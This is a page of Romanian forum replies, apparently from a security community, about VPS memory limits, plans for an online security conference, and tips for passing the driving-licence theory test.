  20. Nu stiu daca ajuta, dar daca crapa random servicii (e.g. Apache, MySQL) poate sa fie de la resurse putine. Eu am un "vps" pe DigitalOcean pe care tin xssfuzzer.com si imi crapa random. Dupa ceva cautari prin loguri problema pare sa fie cel 1GB de RAM. Dar na, mie mi se rupe de acel site, mai mult il folosesc pentru teste.
  21. Complet nu cred ca se poate, doar in cazul in care ambele sunt rootate si ai o aplicatie care stie sa cloneze tot. Dar setarile le poti reface rapid.
  22. Ne apucam de treaba, va tinem la curent. Multumim pentru idei, vom face demo-uri cu mai multe solutii sa vedem pe care o alegem. Intre timp, votati in Poll, ne ajuta statistic si sa stim pe cine ne putem baza. Vom face o noua categorie pe forum in care vom discuta toate detaliile daca e necesar. Si veniti cu idei, nimic nu e batut in cuie. Incercam sa fim complet transparenti. Primul pas: https://rstcon.com/
  23. Nu sunt asa multe, dar in principiu nu trebuie sa le inveti pe de rost si sa te gandesti la "cat de naspa e daca". 1. Cat de naspa e daca "conduc drogat"? 2. Cat de naspa e daca depasesc cu 10kmph viteza maxima? Dar cu 50kmph? 3. Cat de naspa e daca X? Si iti dai seama dintre raspunsuri care e cel mai potrivit. Pentru punctul 1 cu siguranta nu o sa fie "avertisment verbal". Si faci teste multe pe drpciv.ro (neaparat aici, nu pe alte mizerii). Si inainte sa apesi pe "Raspunde", copiezi intrebarea. Daca vezi ca ai gresit cauti titlul intrebarii copiat pe Google si o sa o gasesti pe scoalarutiera.ro cu explicatiile de rigoare alaturi de raspunsul/raspunsurile corecte.
  24. Da, cam asta e singura problema pe care o vad: nu ne pricepem la dinastea Dar gasim noi o solutie. Ma gandeam la Zoom (video conferinta + mic chat pentru intrebari) + Slack (se pot face canale publice si private) - insa ne vom uita si la Team si Discord. Momentan eu sper sa gasim cat mai multe persoane interesate ca participanti.
  25. Persoane de pe forum sunt seniori si team leads la echipe de security prin toata tara si prin afara. Intradevar, pe forum sunt si persoane care doar vor anumite lucruri gratis, scopul nostru e sa ii indrumam. Asa am fost si noi si asa am crescut. Si o conferinta ar fi un bun pas spre educatie.
×
×
  • Create New...